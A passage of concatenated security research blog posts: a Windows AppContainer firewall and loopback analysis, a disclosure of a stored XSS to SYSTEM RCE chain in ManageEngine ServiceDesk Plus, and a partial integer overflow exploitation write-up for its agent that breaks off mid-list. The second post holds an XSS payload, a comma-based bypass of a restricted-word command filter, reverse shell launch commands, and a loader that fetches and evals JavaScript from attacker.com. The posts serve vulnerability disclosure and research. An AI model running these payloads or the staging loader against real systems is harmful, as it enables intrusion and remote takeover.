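    $listener = [System.Net.Sockets.TcpListener]::new([System.Net.IPAddress]::Any, 8080)
    $listener.Start()
}

If the Photos firewall rule shown above is present, the listener should be reachable through the firewall without any administrator interaction.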

Localhost Access

One of the specific restrictions imposed on AppContainer applications is blocking access to localhost. The purpose of this is to make it more difficult to exploit local network services which might not correctly handle AppContainer callers, which could otherwise create a sandbox escape. Let's test the behavior out and try to connect to a localhost service.

PS> $token = Get-NtToken -LowBox -PackageSid "LOOPBACK"

PS> Invoke-NtToken $token {

    [System.Net.Sockets.TcpClient]::new("127.0.0.1", 445)

}

Exception calling ".ctor" with "2" argument(s): "A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because

connected host has failed to respond 127.0.0.1:445"

If you compare the error to the one we got when trying to connect to an internet address without the appropriate capability, you'll notice it's different. When we connected to the internet we got an immediate error indicating that access isn't permitted. However, for localhost we instead get a timeout error, preceded by a multi-second delay. Why the difference? Getting the network event which corresponds to the connection and displaying the blocking filter shows something interesting.

PS> Get-FwFilter -Id 69039 |

Format-FwFilter -FormatSecurityDescriptor -Summary

Name       : AppContainerLoopback

Action Type: Block

Key        : a58394b7-379c-43ac-aa07-9b620559955e

Id         : 69039

Description: AppContainerLoopback

Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 18446744073709551614

Conditions :

FieldKeyName               MatchType   Value

------------               ---------   -----

FWPM_CONDITION_FLAGS       FlagsAllSet IsLoopback

FWPM_CONDITION_ALE_USER_ID Equal      

O:LSD:(A;;CC;;;AC)(A;;CC;;;S-1-15-3-1)(A;;CC;;;S-1-15-3-2)...

<Owner> : NT AUTHORITY\LOCAL SERVICE

<DACL>

APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES...

APPLICATION PACKAGE AUTHORITY\Your Internet connection...

APPLICATION PACKAGE AUTHORITY\Your Internet connection, including...

APPLICATION PACKAGE AUTHORITY\Your home or work networks...

NAMED CAPABILITIES\Proximity: (Allowed)(None)(Match)

Everyone: (Allowed)(None)(Match)

NT AUTHORITY\ANONYMOUS LOGON: (Allowed)(None)(Match)

The blocking filter is not in the connect layer as you might expect, instead it's in the receive/accept layer. This explains why we get a timeout rather than immediate failure: the “inbound” connection request is being dropped as per the default configuration. This means the TCP client waits for the response from the server, until it eventually hits the timeout limit.

The second interesting thing to note about the filter is it's not based on an IP address such as 127.0.0.1. Instead it's using a condition which checks for the IsLoopback condition flag (FWP_CONDITION_FLAG_IS_LOOPBACK in the SDK). This flag indicates that the connection is being made through the built-in loopback network, regardless of the destination address. Even if you access the public IP addresses for the local network interfaces the packets will still be routed through the loopback network and the condition flag will be set.

The user ID check is odd, in that the security descriptor matches both AppContainer and non-AppContainer processes. This is of course the point: if it didn't match both, then it wouldn't block the connection. However, it's not immediately clear what its actual purpose is if it just matches everything. In my opinion, it adds a risk that the filter will be ignored if the socket creator has disabled the Everyone group. This condition was modified to support LPAC since Windows 8, so it's presumably intentional.

You might ask, if the filter would block any loopback connection regardless of whether it's in an AppContainer, how do loopback connections work for normal applications? Wouldn't this filter always match and block the connection?  Unsurprisingly there are some additional permit filters before the blocking filter as shown below.

PS> Get-FwFilter -AleLayer RecvAcceptV4 -Sorted |

Where-Object Name -Match AppContainerLoopback | Format-FwFilter

Name       : AppContainerLoopback

Action Type: Permit

...

Conditions :

FieldKeyName         MatchType   Value

------------         ---------   -----

FWPM_CONDITION_FLAGS FlagsAllSet IsAppContainerLoopback

Name       : AppContainerLoopback

Action Type: Permit

...

Conditions :

FieldKeyName         MatchType   Value

------------         ---------   -----

FWPM_CONDITION_FLAGS FlagsAllSet IsReserved

Name       : AppContainerLoopback

Action Type: Permit

...

Conditions :

FieldKeyName         MatchType   Value

------------         ---------   -----

FWPM_CONDITION_FLAGS FlagsAllSet IsNonAppContainerLoopback

The three filters shown above only check for different condition flags, and you can find documentation for the flags on MSDN. Starting at the bottom we have a check for IsNonAppContainerLoopback. This flag is set on a connection when the loopback connection is between non-AppContainer created sockets. This filter is what grants normal applications loopback access. It's also why an application can listen on localhost even if it's not granted access to receive connections from the network in the firewall configuration.

In contrast, the first filter checks for the IsAppContainerLoopback flag. Based on the documentation and the name, you might assume this would allow any AppContainer to communicate over loopback with any other. However, based on testing, this flag is only set if the two AppContainers have the same package SID. This is presumably to allow an AppContainer to communicate with itself or other processes within its package through loopback sockets.
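A rough way to check this (a sketch, assuming both ends run under the same arbitrary "SAMEPKG" LowBox token and an unused port):

PS> $token = Get-NtToken -LowBox -PackageSid "SAMEPKG"
PS> Invoke-NtToken $token {
    $listener = [System.Net.Sockets.TcpListener]::new([System.Net.IPAddress]::Loopback, 8888)
    $listener.Start()
    [System.Net.Sockets.TcpClient]::new("127.0.0.1", 8888).Connected
}
True

Repeating the test with a different package SID on each end would be expected to hit the AppContainerLoopback block filter and time out instead.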

This flag is also, I suspect, the reason that connecting to a loopback socket is handled in the receive layer rather than the connect layer. Perhaps WFP can't easily tell ahead of time whether both the connecting and receiving sockets will be in the same AppContainer package, so it delays resolving that until the connection has been received. This does lead to the unfortunate behavior that blocked loopback sockets time out rather than fail immediately.

The final flag, IsReserved is more curious. MSDN of course says this is “Reserved for future use.”, and the future is now. Though checking back at the filters in Windows 8.1 also shows it being used, so if it was reserved it wasn't for very long. The obvious conclusion is this flag is really a “Microsoft Reserved” flag, by that I mean it's actually used but Microsoft is yet unwilling to publicly document it.

What is it used for? AppContainers are supposed to be a capability-based system, where you can just add new capabilities to grant additional privileges. It would make sense to have a loopback capability to grant access, which could be restricted to debugging purposes only. However, it seems that loopback access was so beyond the pale for the designers that instead you can only grant access for debugging purposes through an administrator-only API. Perhaps it's related?

PS> Add-AppModelLoopbackException -PackageSid "LOOPBACK"

PS> Get-FwFilter -AleLayer ConnectV4 |

Where-Object Name -Match AppContainerLoopback |

Format-FwFilter -FormatSecurityDescriptor -Summary

Name       : AppContainerLoopback

Action Type: CalloutInspection

Key        : dfe34c0f-84ca-4af1-9d96-8bf1e8dac8c0

Id         : 54912247

Description: AppContainerLoopback

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 18446744073709551615

Callout Key: FWPM_CALLOUT_RESERVED_AUTH_CONNECT_LAYER_V4

Conditions :

FieldKeyName               MatchType Value

------------               --------- -----

FWPM_CONDITION_ALE_USER_ID Equal     D:(A;NP;CC;;;WD)(A;NP;CC;;;AN)(A;NP;CC;;;S-1-15-3-1861862962-...

<DACL>

Everyone: (Allowed)(NoPropagateInherit)(Match)

NT AUTHORITY\ANONYMOUS LOGON: (Allowed)(NoPropagateInherit)(Match)

PACKAGE CAPABILITY\LOOPBACK: (Allowed)(NoPropagateInherit)(Match)

LOOPBACK: (Allowed)(NoPropagateInherit)(Match)

First we add a loopback exemption for the LOOPBACK package name. We then look for the AppContainerLoopback filters in the connect layer; the one we're interested in is shown. The first thing to note is that the action type is set to CalloutInspection. This might seem slightly surprising; you would expect it to do something more than inspect the traffic.

The name of the callout, FWPM_CALLOUT_RESERVED_AUTH_CONNECT_LAYER_V4 gives the game away. The fact that it has RESERVED in the name can't be a coincidence. This callout is one implemented internally by Windows in the TCPIP!WfpAlepDbgLowboxSetByPolicyLoopbackCalloutClassify function. This name now loses all mystery and pretty much explains what its purpose is, which is to configure the connection so that the IsReserved flag is set when the receive layer processes it.

The user ID here is equally important. When you register the loopback exemption you only specify the package SID, which is shown in the output as the last “LOOPBACK” line. Therefore you'd assume you'd need to always run your code within that package. However, the penultimate line is “PACKAGE CAPABILITY\LOOPBACK” which is my module's way of telling you that this is the package SID, but converted to a capability SID. This is basically changing the first relative identifier in the SID from 2 to 3.

We can use this behavior to simulate a generic loopback exemption capability. It allows you to create an AppContainer sandboxed process which has access to localhost and isn't restricted to a particular package. This would be useful for applications such as Chrome to implement a network-facing sandboxed process, and it would work from Windows 8 through 11. Unfortunately it's not officially documented so can't be relied upon. An example demonstrating the use of the capability is shown below.

PS> $cap = Get-NtSid -PackageSid "LOOPBACK" -AsCapability

PS> $token = Get-NtToken -LowBox -PackageSid "TEST" -cap $cap

PS> $sock = Invoke-NtToken $token {

    [System.Net.Sockets.TcpClient]::new("127.0.0.1", 445)

}

PS> $sock.Client.RemoteEndPoint

AddressFamily Address   Port

------------- -------   ----

 InterNetwork 127.0.0.1  445

Conclusions

That wraps up my quick overview of how AppContainer network restrictions are implemented using the Windows Firewall. I covered the basics of the Windows Firewall as well as some of the tooling I wrote to analyze its configuration. This background information allowed me to explain why the issue I reported to Microsoft worked. I also pointed out some of the quirks of the implementation which you might find of interest.

Having a good understanding of how a security feature works is an important step towards finding security issues. I hope that by providing both the background and tooling other researchers can also find similar issues and try and get them fixed.

Stored XSS to RCE Chain as SYSTEM in ManageEngine ServiceDesk Plus

17 August 2021 at 13:02

The unauthorized access of FireEye red team tools was an eye-opening event for the security community. In my personal opinion, it was especially enlightening to see the “prioritized list of CVEs that should be addressed to limit the effectiveness of the Red Team tools.” This list can be found on FireEye’s GitHub. The list reads to me as though these vulnerabilities are probably being exploited during FireEye red team engagements. More than likely, the listed products are commonly found in target environments. As a 0-day bug hunter, this screams out, “hunt me!” So we did.

Last, but not least, on the list is “CVE-2019–8394 — arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus.” A Shodan search for “ManageEngine ServiceDesk Plus” in the page title reveals over 5,000 public-facing instances. We chose to target this product, and we found some high impact vulnerabilities. On one hand, we’ve found a way to fully compromise the server, and on the other, we can exploit the agent software. This is a pentester’s pivoting playground.

Our story will be split into two blogs. Pivot over to David Wells' related blog to check out a mind-bending heap overflow in the AssetExplorer Agent. For bugs on the server side, stay tuned.

TLDR

ManageEngine ServiceDesk Plus, prior to version 11200, is susceptible to a vulnerability chain leading to unauthenticated remote code execution. An unauthenticated, remote attacker is able to upload a malicious asset to the help desk. Once an unknowing help desk administrator views this new asset, the attacker can take control of the help desk application and fully compromise the underlying operating system.

The two flaws in the exploit chain include an unauthenticated stored cross-site scripting vulnerability (CVE-2021–20080) and a case of weak input validation (CVE-2021–20081) leading to arbitrary code execution. Initial access is first gained via cross-site scripting, and once triggered, the attacker can schedule the execution of malicious code with SYSTEM privileges. Below I have detailed these vulnerabilities.

Gaining a Foothold via XML Asset Ingestion

A key component of an IT service desk is the ability to manage assets. For example, company laptops, desktops, etc. would likely be provisioned by IT and managed in service desk software.

In ManageEngine ServiceDesk Plus (SDP), there is an API endpoint that allows an unauthenticated HTTP client to upload XML files containing asset definitions. The asset definition file allows all sorts of details to be defined, such as make, model, operating system, memory, network configuration, software installed, etc.

When a valid asset is POSTed to /discoveryServlet/WsDiscoveryServlet, an XML file is created on the server’s file system containing the asset. This file will be stored at C:\Program Files\ManageEngine\ServiceDesk\scannedxmls.

After a minute or so, it will be automatically picked up by SDP for processing. The asset will then be stored in the database, and it will be viewable as an asset in the administrative web user interface.
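The upload itself is a single unauthenticated POST (a sketch; the host is a placeholder, and asset.xml is an asset definition like the one shown below):

PS> $xml = Get-Content -Raw asset.xml
PS> Invoke-WebRequest -Method Post -ContentType "text/xml" -Body $xml -Uri "http://target:8080/discoveryServlet/WsDiscoveryServlet"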

Below is an example of a Mac asset being uploaded. For the sake of brevity, I’ve left out most of the XML file. The key component is bolded on the line starting with “inet” in the “/sbin/ifconfig” output. The full proof of concept (PoC) can be found on our TRA-2021–11 research advisory.

Notice that the IP address contains JavaScript code to fire an alert. This is where the vulnerability rears its ugly head. The injected JavaScript will not be sanitized prior to being loaded in a web browser. Hence, the attacker can execute arbitrary JavaScript and abuse this flaw to perform administrative actions in the help desk application.

<?xml version="1.0" encoding="UTF-8" ?><DocRoot>
… snip ...
<NIC_Info><command>/sbin/ifconfig</command><output><![CDATA[
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
options=400<CHANNEL_IO>
ether 8c:85:90:d4:a6:e9
inet6 fe80::103b:588a:7772:e9db%en0 prefixlen 64 secured scopeid 0x5
inet ');}{alert("xss");// netmask 0xffffff00 broadcast 192.168.0.255
nd6 options=201<PERFORMNUD,DAD>
media: autoselect
status: active
]]></output></NIC_Info>
… snip ...
</DocRoot>

Let’s assume this XML is processed by SDP. When the administrator views this specific asset in SDP, a JavaScript alert would fire.

It’s pretty clear here that a stored cross-site scripting vulnerability exists, and we’ve assigned it as CVE-2021–20080. The root cause of this vulnerability is that the IP address is used to construct a JavaScript function without sanitization. This allows us to inject malicious JavaScript. In this case, the function would be constructed as such:

function clickToExpandIP(){
jQuery('#ips').text('[ ');}{alert("xss");// ]');
}

Notice how I closed the text() function call and the clickToExpandIP() function definition.

.text('[ ');}

After this, since there is a hanging closing curly brace on the next line, I start a new block, call alert, and comment out the rest of the line.

{alert("xss");//

Alert! We won’t stop here. Let’s ride the victim administrator’s session.

Reusing the HttpOnly Cookies

When a user logs in, the following session cookies are set in the response:

Set-Cookie: SDPSESSIONID=DC6B4FDF88491030FD4CE332509EE267; Path=/; HttpOnly
Set-Cookie: JSESSIONIDSSO=167646B5D793A91BC5EA12C1CAB9BEAB; Path=/; HttpOnly

The cookies have the HttpOnly flag set, which prevents JavaScript from accessing these cookie values directly. However, that doesn’t mean we can’t reuse the cookies in an XMLHttpRequest. The cookies will be included in the request, just as if it were a form submission.

The problem here is that a CSRF token is also in play. For example, if a user were to be deleted, the following request would fire.

DELETE /api/v3/users?ids=9 HTTP/1.1
Host: 172.26.31.177:8080
Content-Length: 160
Cache-Control: max-age=0
Accept: application/json, text/javascript, */*; q=0.01
X-ZCSRF-TOKEN: sdpcsrfparam=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638
X-Requested-With: XMLHttpRequest
If-Modified-Since: Thu, 1 Jan 1970 00:00:00 GMT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.26.31.177:8080
Referer: http://172.26.31.177:8080/SetUpWizard.do?forwardTo=requester&viewType=list
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SDPSESSIONID=DC6B4FDF88491030FD4CE332509EE267; JSESSIONIDSSO=167646B5D793A91BC5EA12C1CAB9BEAB; PORTALID=1; sdpcsrfcookie=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638; _zcsr_tmp=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638; memarketing-_zldp=Mltw9Iqq5RScV1w4XmHqtfyjDzbcGg%2Fgj2ZFSsChk9I%2BFeA4HQEbmBi6kWOCHoEBmdhXfrM16rA%3D; memarketing-_zldt=35fbbf7a-4275-4df4-918f-78167bc204c4-0
Connection: close
sdpcsrfparam=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638&SUBREQUEST=XMLHTTP

Notice the use of the ‘X-ZCSRF-TOKEN’ header and the ‘sdpcsrfparam’ request parameter. The token value is also passed in the ‘sdpcsrfcookie’ and ‘_zcsr_tmp’ cookies. This means subsequent requests won’t succeed unless we set the proper CSRF headers and cookies.

However, the CSRF cookies are set without the HttpOnly flag. Because of this, our malicious JavaScript can harvest the value of the CSRF token in order to provide the required headers and request data.

Putting it all together, we are able to send an XMLHttpRequest:

  • with the proper session cookie values
  • and with the required CSRF token values.

No Spaces Allowed

Another fun roadblock was the fact that spaces couldn’t be included in the IP address. If we were to specify the line with “AN IP” as the IP address:

inet AN IP netmask 0xffffff00 broadcast 192.168.0.255

The JavaScript function would be generated as such:

function clickToExpandIP(){
jQuery('#ips').text('[ AN ]');
}

Notice that ‘IP’ was truncated. This is due to the way that ServiceDesk Plus parses the IP address field. It expects an IP address followed by a space, so the “IP” text would be truncated in this case.

However, this can be bypassed using multiline comments to replace spaces.

');}{var/**/text="stillxss";alert(text);//

Putting these pieces together, this means when we exploit the XSS, and the administrator views our malicious asset, we can fire valid (and complex) application requests with administrative privileges. In particular, I ended up abusing the custom scheduled task feature.

Code Execution via a Malicious Custom Schedule

Being an IT service desk software, ManageEngine ServiceDesk Plus has loads of functionality. Similar to other IT software out there, it allows you to create custom scheduled tasks. Also similar to other IT software, it lets you run system commands. With powerful functionality, there is a fine line separating a vulnerability and a feature that simply works as designed. In this case, there is a clear vulnerability (CVE-2021–20081).

Custom Schedule Screen

Above I have pasted a screenshot of the form that allows an administrator to create a custom schedule. Notice the executor example in the Action section. This allows the administrator to run a command on a scheduled basis.

Dangerous, yes. A vuln? Not yet. It’s by design.

What happens if the administrator wants to write some text to the file system using this feature?

Administrator attempts to write to C:\test.txt

Interestingly, “echo” is a restricted word. Clearly a filter is in place to deny this word, probably for cases like this. After some code review, I found an XML file defining a list of restricted words.

C:\Program Files\ManageEngine\ServiceDesk\conf\Asset\servicedesk.xml:

<GlobalConfig globalconfigid="GlobalConfig:globalconfigid:2600" category="Execute_Script" parameter="Restricted_Words" paramvalue="outfile,Out-File,write,echo,OpenTextFile,move,Move-Item,move,mv,MoveFile,del,Remove-Item,remove,rm,unlink,rmdir,DeleteFile,ren,Rename-Item,rename,mv,cp,rm,MoveFile" description="Script Restricted Words"/>

Notice the word “echo” and a bunch of other words that all seem to relate to file system operations. Clearly the developer did not want to allow a custom scheduled task to explicitly modify files.

If we look at com.adventnet.servicedesk.utils.ServiceDeskUtil.java, we can see how the filter is applied.

public String[] getScriptRestrictedWords() throws Exception {
    String restrictedWords = GlobalConfigUtil.getInstance()
        .getGlobalConfigValue("Restricted_Words", "Execute_Script");
    return restrictedWords.split(",");
}

public Set containsScriptRestrictedWords(String input) throws Exception {
    HashSet<String> input_words = new HashSet<String>();
    input_words.addAll(Arrays.asList(input.split(" ")));
    input_words.retainAll(Arrays.asList(this.getScriptRestrictedWords()));
    return input_words;
}

Most notably, the command line input string is split into words using a space character as a delimiter.

input_words.addAll(Arrays.asList(input.split(" ")));

This method of blocking commands containing restricted words is simply inadequate, and this is where the vulnerability comes into play. Let me show you how this filter can be bypassed.

One bypass for this involves the use of commas (or semicolons) to delimit the arguments of a command. For example, all of these commands are equivalent.

c:\>echo "Hello World"
"Hello World"
c:\>echo,"Hello World"
"Hello World"
c:\>echo;"Hello World"
"Hello World"

With this in mind, an administrator could craft a command with commas to write to disk. For example:

cmd /c "echo,testing > C:\\test.txt"
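To see why the filter misses this, here's a quick PowerShell approximation of the Java check above (the restricted list is truncated for illustration):

PS> $restricted = "echo","del","move"
PS> $cmd = 'cmd /c "echo,testing > C:\test.txt"'
PS> ($cmd -split " ") | Where-Object { $restricted -contains $_ }

The pipeline produces no output: "echo,testing" is a single space-delimited token, so it never equals the restricted word "echo", yet cmd.exe happily treats the comma as an argument separator.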

Even better, the command will execute with NT AUTHORITY\SYSTEM privileges. Sysinternals Process Monitor will prove that:

Pop a Shell

I opted for a Java-based reverse shell since I knew a Java executable would be shipped with ServiceDesk Plus. It is written in Java, after all. The command line contains the following logic.

I first used ‘echo’ to write out a Base64-encoded Java class.

echo,<Base64 encoded Java reverse shell class>> b64file

After that I used ‘certutil’ to decode the data into a functioning Java class. Thanks to Casey Dunham for the awesome Java reverse shell.

certutil -f -decode b64file ReverseTcpShell.class

And finally, I used the provided Java executable to launch a reverse shell that connects back to the attacker’s listener at IP:port.

C:\\PROGRA~1\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe ReverseTcpShell <attacker ip> <attacker port>

Chaining these Together

From a high level, an exploit chain looks like the following:

  1. Send an XML asset file to SDP containing our malicious JavaScript code.
  2. After a short period of time, SDP will process the XML file and add the asset.
  3. When the administrator views the asset, the JavaScript fires. This can be encouraged by sending a link to the administrator.
  4. The JavaScript will create a malicious custom scheduled task to execute in 1 minute.
  5. After one minute, the scheduled task executes, and a reverse shell connects back to the attacker’s machine.

This is the basic overview of a full exploit chain. However, there was a wrench thrown in that I'd like to mention: a maximum payload length was enforced. Due to the length of a reverse shell payload, this restriction required me to use a staged approach.

Let me show you.

Staging the Custom Schedule

In order to solve this problem, I set up an HTTP listener that, when contacted by my XSS payload, would send more JavaScript code back to the browser. The XSS would then call eval() on this code, thereby loading another stage of JavaScript code.

So basically, the initial XSS payload contains just enough code to reach out to the attacker's HTTP server and download another stage of JavaScript to be executed using eval(). Something like this:

function loaded() {
    eval(this.responseText);
}

var req = new XMLHttpRequest();
req.addEventListener("load", loaded);
req.open("GET", "http://attacker.com/more_js");
req.send(null);

Once the JavaScript downloads, the loaded() function fires. The one catch is that since we’re in the browser, a CORS header needs to be set by the attacker’s listener:

Access-Control-Allow-Origin: *
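The attacker's listener can be as simple as this sketch (assuming .NET's HttpListener driven from PowerShell; the port and the stage2.js file name are placeholders):

PS> $http = [System.Net.HttpListener]::new()
PS> $http.Prefixes.Add("http://+:8000/")
PS> $http.Start()
PS> while ($true) {
    $ctx = $http.GetContext()
    $ctx.Response.Headers.Add("Access-Control-Allow-Origin", "*")
    $body = [System.IO.File]::ReadAllBytes("stage2.js")
    $ctx.Response.OutputStream.Write($body, 0, $body.Length)
    $ctx.Response.Close()
}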

This will tell the browser it’s okay to load the attacker server’s content in the ServiceDesk Plus application, since they’re cross-origin. Using this strategy, a massive chunk of JavaScript can be loaded. With all of this in mind, a full exploit can be constructed like so:

  1. Send an XML asset file to SDP containing our malicious JavaScript code.
  2. After a short period of time, SDP will process the XML file and add the asset.
  3. When the administrator views the asset, the JavaScript fires. This can be encouraged by sending a link to the administrator.
  4. The XSS will download more JavaScript from the attacker’s HTTP server.
  5. The downloaded JavaScript will create a malicious custom scheduled task to execute in 1 minute.
  6. After one minute, the scheduled task executes, and a reverse shell connects back to the attacker’s machine.

Let’s see all of this in action:

https://www.youtube.com/watch?v=DhrJxVqmsIo

Wrapping Up

We’ve now seen how an unauthenticated attacker can exploit a cross-site scripting vulnerability to gain remote code execution in ManageEngine ServiceDesk Plus. As I said earlier, David Wells has managed to exploit a heap overflow in the AssetExplorer agent software. If you’re an SDP or AssetExplorer server administrator, this is the agent software that you would distribute to assets on the network. This vulnerability would allow an attacker to pivot from SDP to agents. As you might imagine, this is a dangerous attack scenario.

ManageEngine did a solid job of patching. I reported the bugs on March 17, 2021. The XSS was patched by April 07, 2021, and the RCE was patched by June 1, 2021. That’s a fast turnaround!

For more detailed information on the vulnerabilities, take a look at our research advisories: TRA-2021–11 and TRA-2021–22.



Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

17 August 2021 at 13:02


A couple months back, Chris Lyne and I had a look at ManageEngine ServiceDesk Plus. This product consists of a server/agent model in which agents provide updates on machine status back to the ManageEngine server. Chris ended up finding an unauth XSS-to-RCE chain in the server component, which you can read about here: https://medium.com/tenable-techblog/stored-xss-to-rce-chain-as-system-in-manageengine-servicedesk-plus-493c10f3e444, allowing an attacker to fully compromise the server with SYSTEM privileges.

This blog will go over the exploitation of an integer overflow that I found in the agents themselves, called the Asset Explorer Agent (CVE-2021–20082). This exploit could allow an attacker to pivot through the network once the ManageEngine server is compromised. Alternatively, it could be exploited by spoofing the ManageEngine server IP on the network and triggering the vulnerability, as we will touch on later. While this PoC is not super reliable, it has been proven to work after several tries on a Windows 10 Pro 20H2 box (see below). I believe that further work on heap grooming could increase the odds of exploitation.

Linux machine (left), remotely exploiting integer overflow in ManageEngine Asset Explorer running on Windows 10 (right) and popping up a “whoami” dialog.

Attack Vector

The ManageEngine Windows agent executes as a SYSTEM service and listens on the network for commands from its ManageEngine server. While TLS is used for these requests, the agent never validates the certificate, so anyone on the network is able to perform the TLS handshake and send an unauthorized command to the agent. In order for the agent to run the command, however, the agent expects to receive an authtoken, which it echoes back to its configured server IP address for final approval. Only then will the agent carry out the command. This presents a small problem since that configured IP address is not ours; the agent instead asks the real ManageEngine server to approve our authtoken, which is always going to be denied.

There is a way an attacker can exploit this design, however, and that's by spoofing their IP on the network to be the ManageEngine server. I mentioned certs are not validated, which allows an attacker to send and receive requests without an issue. This gives full control over the authtoken approval step, resulting in the agent running any arbitrary agent command from an attacker.

From here, you may think there is a command that can remotely run tasks or execute code on agents. Unfortunately, this was not the case, as the agent is very lightweight and supports a limited set of features, none of which allowed for logical exploitation. This forced me to look into memory corruption in order to gain remote code execution through this vector. From reverse engineering the agents, I found a couple of small memory handling issues, such as leaks and a heap overflow with unicode data, but nothing that led me to RCE.

Integer Overflow

When the agent receives final confirmation from its server, it is in the form of a POST request from the ManageEngine server. Since we are assuming the attacker has been able to insert themselves as a fake ManageEngine server, or has compromised a real one, this allows them to craft and send any POST request to this agent.

When the agent processes this POST request, WinAPIs for HTTP handling are used. One of these is HttpQueryInfoW, which is used to query the incoming POST request for its “Content-Size” field. This Content-Size field is then used as a size parameter in order to allocate memory on the heap, into which the POST payload data is copied.

There is some integer arithmetic performed between receiving the Content-Size field and actually using this size to allocate heap memory. This is where we can exploit an integer overflow.

Here you can see the Content-Size is incremented by one, multiplied by four, and finally incremented by an extra two bytes. This is a 32-bit agent, using 32-bit integers, which means if we supply a Content-Size the size of UINT32_MAX/4, we should be able to overflow the integer so that it wraps back around to size 2 when passed to calloc. Once this allocation of only two bytes is made on the heap, the following API, InternetReadFile, will copy our POST payload data to the destination buffer until all of the POST data contents are read. If our POST data is larger than two bytes, that data will be copied beyond the two-byte buffer, resulting in a heap overflow.
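We can sanity check the wraparound arithmetic (32-bit unsigned math, as in the agent):

PS> $contentSize = [uint32]0x3FFFFFFF
PS> (([uint64]$contentSize + 1) * 4 + 2) -band 0xFFFFFFFF
2

A two-byte allocation, with an attacker-controlled amount of POST data about to be copied into it.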

Things are looking really good here because we not only can control the size of the heap overflow (tailoring our post data size to overwrite whatever amount of heap memory), but we also can write non-printable characters with this overflow, which is always good for exploiting write conditions.

No ASLR

Did I mention these agents don’t support ASLR? Yeah, they are compiled with no relocation table, which means even if Windows 10 tries to force ASLR, it can’t and defaults the executable base to the PE ImageBase. At this point, exploitation was sounding too easy, but quickly I found…it wasn’t.

Creating a Write Primitive

I can overwrite a controlled amount of arbitrary data on the heap now, but how do I write something and somewhere…interesting? This needs to be done without crashing the agent. From here, I looked for pointers or interesting data on the heap that I could overwrite. Unfortunately, this agent’s functionality is quite small and there were no object or function pointers or interesting strings on the heap for me to overwrite.

In order to do anything interesting, I was going to need a write condition outside the boundaries of this heap segment. For this, I was able to craft a Write-AlmostWhat-Where by abusing heap cell pointers used by the heap manager. Asset Explorer contains Microsoft's CRT heap library for managing the heap. The implementation uses a doubly linked list to keep track of allocated cells and generally looks something like this:

Just like when any linked list is altered (in this case via a heap free or heap malloc), the next and prev pointers must be readjusted after insertion or deletion of a node (seen below).

For our attack we will be focusing on exploiting the free logic which is found in the Microsoft Free_dbg API. When a heap cell is freed, it removes the target node and remerges the neighboring nodes. Below is the Free_dbg function from Microsoft library, which uses _CrtMemBlockHeader for its heap cells. The red blocks are the remerging logic for these _CrtMemBlockHeader nodes in the linked list.

This means if we overwrite a _CrtMemBlockHeader's *prev pointer with an arbitrary address (ideally an address outside of this cursed memory segment we are stuck in), then upon that heap cell being freed, the _CrtMemBlockHeader *next pointer will be written to wherever *prev points. It gets better… we can also overflow into the _CrtMemBlockHeader *next pointer as well, allowing us to control what *next is, thus creating an arbitrary write condition for us, one DWORD at a time.

There is a small catch, however. The _CrtMemBlockHeader *next and *prev pointers are both dereferenced and written to in this remerging logic, which means I can't just overwrite the *prev pointer with any arbitrary data I want; it must itself be a valid pointer to writable memory, since its contents will also be written to during the Free_dbg function. This means I can only write pointers to places in memory, and those pointers must point to writable memory themselves. This prevents me from writing executable memory pointers (as those point to RX protected memory) as well as from writing pointers to non-existent memory (as the dereference step in Free_dbg would cause an access violation). This proved to be very constraining for my exploitation.

Data-Only Attack

Data-only attacks are getting more popular for exploiting memory corruption bugs, and I’m definitely going to opt for that here. This binary has no ASLR to worry about, so browsing the .data section of the executable and finding an interesting global variable to overwrite is the best step. When searching for these, many of the global variables point to strings, which seem cool — but remember, it will be very hard to abuse my write primitive to overwrite string data, since the string data I would want to write must represent a pointer to valid and writable memory in the program. This limits me to searching for an interesting global variable pointer to overwrite.

Step 1 : Overwrite the Current Working Directory

I found a great candidate to leverage this pointer write primitive. It is a global variable pointer in Asset Explorer’s .data section that points to a unicode string that dictates the current working directory of the Manage Engine agent.

We need to know how this is used in order to abuse it correctly, and a few XREFs later, I found this string pointer is dereferenced and passed to SetCurrentDirectory whenever a “NEWSCAN” request is sent to the agent (which we can easily do as a remote attacker). This call dynamically changes the current working directory of the remote Asset Explorer service, which is exactly what I want for developing an exploit. Even better, the NEWSCAN request then calls CreateProcess to execute a .bat file from the current working directory. If we can modify the current working directory to point to a remote SMB share we own, and place a malicious .bat file on our share with the same name, then Asset Explorer will try to execute this .bat file off our SMB share instead of the local one, resulting in RCE. All we need to do is modify this pointer so that it points to a malicious remote SMB path we own, trigger a NEWSCAN request so that the current working directory is changed, and make it execute our .bat file.

Since ASLR is not enabled, I know what this pointer address will be, so we just need to trigger our heap overflow to exploit my pointer write condition with Free_dbg to replace this pointer.

To effectively change this current working directory, you would need to:

1. Trigger the heap overflow to overwrite the *next and *prev pointers of a heap cell that will be freed (medium)

2. Overwrite the *next pointer with the address of this current working directory global variable as it will be the destination for our write primitive (easy)

3. Overwrite the *prev pointer with a pointer that points to a unicode string of our SMB share path (hard).

